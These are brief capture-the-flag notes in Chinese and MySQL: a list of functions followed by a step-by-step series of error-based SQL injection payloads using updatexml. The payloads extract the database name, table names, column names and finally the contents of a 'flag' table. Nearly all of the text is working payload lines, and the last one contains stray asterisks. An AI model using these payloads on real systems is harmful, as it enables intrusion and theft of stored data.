用到的函数
updatexml(1, ,1)
concat(0x7e, ,0x7e)
group_concat(目标值)
right(,32)
1
1'
1 union select updatexml(1,concat(0x7e,database(),0x7e),1)
1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='sqli'),0x7e),1)
1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)
1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1)
1 union select updatexml(1,**concat(0x7e,right((select(group_concat(flag))from sqli.flag),32),0x7e),**1)
